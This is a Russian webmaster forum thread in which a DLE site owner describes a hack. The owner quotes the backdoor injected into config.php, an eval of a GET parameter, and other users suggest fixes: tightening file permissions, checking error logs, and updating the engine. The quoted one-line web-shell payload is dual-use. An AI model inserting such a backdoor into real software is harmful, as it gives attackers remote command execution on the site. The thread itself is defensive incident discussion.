X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Взломы сайтов., У меня взломали сайт
elvis81
elvis81
Topic Starter сообщение 11.12.2010, 22:24; Ответить: elvis81
Сообщение #1


Познающий
******

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 222 раза
Репутация:   34  


Доброго времени суток, Уважаемые Форумчане!!!


Спешу поделиться своей проблеммой.

Вчера вечером я как обычно отмодерировал свой сайт и вышел с него. Примерно через час зашел чтобы добавить статью и увидел что страничка не доступна, ну я снес это на работу Хостинга. И думал что через час другой всё будет ОК.

Как же я удивился, когда и утром не смог войти на свой сайт. Что-то хостер лежит подумал я и сначала не придал значения тому что домен доступен но открывается нулевая страничка. Зная что возможно некоторые сайты хостера сидят под DDOS атакой, а такое уже бывало, все сайты будут работать со сбоями. И случайно вошел на поддомен сайта на который у меня поставлен отдельный сайт. И вуаля, сайт поддомен работает как ни в чём ни бывало. Тогда я стал ковыряться у себя попытался войти в Админку где мне и было написано что есть еррор.


Выяснилось что была сделана инъекция вируса в файл config.php (движок DLE)
В самом низу была добавлена инъекция вида ('lang_1111111' => ""{${@eval($_GET[cmdz])}}"",)

Теперь сижу и ищу чего ещё намутили енти Хацкеры.

Если у кого похожая ситуация, то немедленно проверяйте все файлы своих движков на предмет инъекций..



С уважением Elvis

Да и ещё если есть мысли где ещё может чего быть то подскажите где искать чтобы почистить код.


--------------------
ТИц поднимают, поднималкой для ТИца
-1
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ukrseo
ukrseo
сообщение 11.12.2010, 22:26; Ответить: ukrseo
Сообщение #2


клоновод
**

Группа: Banned
Сообщений: 56
Регистрация: 29.3.2010
Поблагодарили: 20 раз
Репутация:   2  


Вам в помощь http://dle-news.ru/bags/v85/1040-nedostato...hix-dannyx.html только это надо проделывать до заражения чтоб не подвергнуться несанкционированому доступу к сайту.


--------------------
клоновод
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
elvis81
elvis81
Topic Starter сообщение 11.12.2010, 22:31; Ответить: elvis81
Сообщение #3


Познающий
******

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 222 раза
Репутация:   34  


ukrseo, Спасибо большое, tongue.gif но у меня 7.5 DLE И это совсем не помощь от вас.


--------------------
ТИц поднимают, поднималкой для ТИца
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ukrseo
ukrseo
сообщение 11.12.2010, 22:37; Ответить: ukrseo
Сообщение #4


клоновод
**

Группа: Banned
Сообщений: 56
Регистрация: 29.3.2010
Поблагодарили: 20 раз
Репутация:   2  


(elvis81 @ 11.12.2010, 21:31) *
ukrseo, Спасибо большое, tongue.gif но у меня 7.5 DLE И это совсем не помощь от вас.



Читните внимательно что по ссылке Ошибка в версии: 7.x - 8.5 по сабжу скажу больше на сервере есть фаил ERORLOG в нём вы можете увидеть в каих файлах ошибку выдаёт сервер и даже то в какой строке находиться злосный код.И после этого скачать файлы на машину и почистить код.Так же гляньте фаил dbconfig.php строка 18 нет ли там абры кадабры типа fiejhgidiuvydufs

Сообщение отредактировал ukrseo - 11.12.2010, 22:37


--------------------
клоновод


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
auter
auter
сообщение 11.12.2010, 22:37; Ответить: auter
Сообщение #5


Бывалый
****

Группа: Banned
Сообщений: 271
Регистрация: 6.7.2010
Поблагодарили: 47 раз
Репутация:   -3  


В том и проблема =) движки нужно обновлять своевременно, иначе дыры так и не будут заделаны, а хацкеры про них вынюхают. Делайте лучше бэкап сайта, до момента инфицирования и обновляйте двиг. Так же форум сносите к чертям, там главная дыра на дле ...
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
elvis81
elvis81
Topic Starter сообщение 11.12.2010, 22:42; Ответить: elvis81
Сообщение #6


Познающий
******

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 222 раза
Репутация:   34  


ukrseo, Вот за это спасибо это уже кое что.

У меня на всех конфигах стояли права 644 только на config.php забыл поставить и осталость 666, а всё из за лени...
Приятно менять настройки из админки, а не с панели управления

Ща просмотрю где код испортили и ещё разок пробегусь и выставлю права на все файлы которые могут повлиять на настройки и работу сайта.
Жаль что с комфортом придётся попращатьсяsad.gif


--------------------
ТИц поднимают, поднималкой для ТИца
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ukrseo
ukrseo
сообщение 11.12.2010, 22:43; Ответить: ukrseo
Сообщение #7


клоновод
**

Группа: Banned
Сообщений: 56
Регистрация: 29.3.2010
Поблагодарили: 20 раз
Репутация:   2  


(elvis81 @ 11.12.2010, 20:42) *
ukrseo, Вот за это спасибо это уже кое что.

У меня на всех конфигах стояли права 644 только на config.php забыл поставить и осталость 666, а всё из за лени...
Приятно менять настройки из админки, а не с панели управления

Ща просмотрю где код испортили и ещё разок пробегусь и выставлю права на все файлы которые могут повлиять на настройки и работу сайта.
Жаль что с комфортом придётся попращаться:(


Зато поздороваться с безопасностью excl.gif


--------------------
клоновод
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
elvis81
elvis81
Topic Starter сообщение 11.12.2010, 22:53; Ответить: elvis81
Сообщение #8


Познающий
******

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 222 раза
Репутация:   34  


(ukrseo @ 11.12.2010, 22:43) *
Зато поздороваться с безопасностью excl.gif

Это точно.

Поискал прогой AVsearch в файлах движка тексты из инъекции (lang_1111111) и (cmdz) и ничего не нашлось.
Наверно она не была доделана до конца? Или всё таки цель была просто заморозить работу сайта?
Одни вопросы блин... nea.gif


--------------------
ТИц поднимают, поднималкой для ТИца
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ukrseo
ukrseo
сообщение 11.12.2010, 22:55; Ответить: ukrseo
Сообщение #9


клоновод
**

Группа: Banned
Сообщений: 56
Регистрация: 29.3.2010
Поблагодарили: 20 раз
Репутация:   2  


(elvis81 @ 11.12.2010, 20:53) *
Это точно.

Поискал прогой AVsearch в файлах движка тексты из инъекции (lang_1111111) и (cmdz) и ничего не нашлось.
Наверно она не была доделана до конца? Или всё таки цель была просто заморозить работу сайта?
Одни вопросы блин... nea.gif


Скорее всего єто был вирус phpC99Shell-D и его цель это простое заражение компьютеров пользователей.


--------------------
клоновод
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
E-body
E-body
сообщение 11.12.2010, 22:59; Ответить: E-body
Сообщение #10


Новичок
*

Группа: Banned
Сообщений: 45
Регистрация: 15.6.2010
Из: LV
Поблагодарили: 10 раз
Репутация:   1  


Кто читает тему имея сайт на dle движке, не думайте что вас этого не коснётся.
Следите за веткой офф сайта http://dle-news.ru/bags/ о найденных уязвимостях.
-
элвису залили локально dbconfig.php через загрузку картинок и просмотрели содержимое.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыДизайн сайтов
Дизайн сайтов
11 Favna 3703 Вчера, 23:57
автор: Favna
Открытая тема (нет новых ответов) Эффективное продвижение сайтов естественными ссылками | Крауд-маркетинг
Ссылки с форумов, сервисов вопросов-ответов и т.д.
7 iworkshop 662 Вчера, 20:54
автор: iworkshop
Горячая тема (нет новых ответов) Разработка сайтов Joomla Wordpress Opencart
Разработка, верстка, оптимизация веб сайтов.
48 WoWeb 7297 Вчера, 13:37
автор: serg5777
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыКачественный прогон Хрумером всего 6 WMZ. Пачки сайтов от 3 WMZ
Большой опыт роботы. Прогон пачок. Комментарии, профиля, гостевые
154 effovenon 77032 Вчера, 10:04
автор: effovenon
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыКомплексный прогон сайтов, нет каталогов №3 от shtaketo, хороший рост НЧ,СЧ,ВЧ Тиц 10-30 пр 1-3
261 shtaketo 217500 11.12.2017, 23:46
автор: Gelik


 



RSS Текстовая версия Сейчас: 13.12.2017, 1:38
Дизайн